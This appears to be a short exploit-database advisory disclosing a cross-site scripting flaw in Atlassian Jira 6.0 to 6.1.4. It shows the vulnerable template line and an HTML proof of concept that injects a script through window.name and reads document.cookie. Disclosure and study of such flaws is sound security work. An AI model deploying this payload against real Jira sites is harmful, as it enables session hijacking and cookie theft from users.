Atlassian Jira versions 6.1.4 and below suffer from a cross site scripting vulnerability.
69982c2e62642ecdd6d36596ed6e34438ea61178dc78a728f96a3b398a394b62
# Exploit Title: Atlassian Jira 6.0.* <= 6.1.4
# Date: 27.01.2016
# Author: Razvan Cernaianu
# Vendor Homepage: https://www.atlassian.com
# Version: 6.0.* <= 6.1.4
# Website: www.CyberSmartDefence.com
# Blog: www.TinKode.com
---[ *Vulnerable Code* ]---
*# Vulnerable Parameter: $window.name <http://window.name><div
class="aui-page-header-main"> <h1>${name}</h1></div>*
---[ *Proof of Concept* ]---
*<html><script> var victim=
window.open('https://victim/secure/Dashboard.jspa
<https://victim/secure/Dashboard.jspa>',
'<script>alert(document.cookie);<\/script>');</script></html> *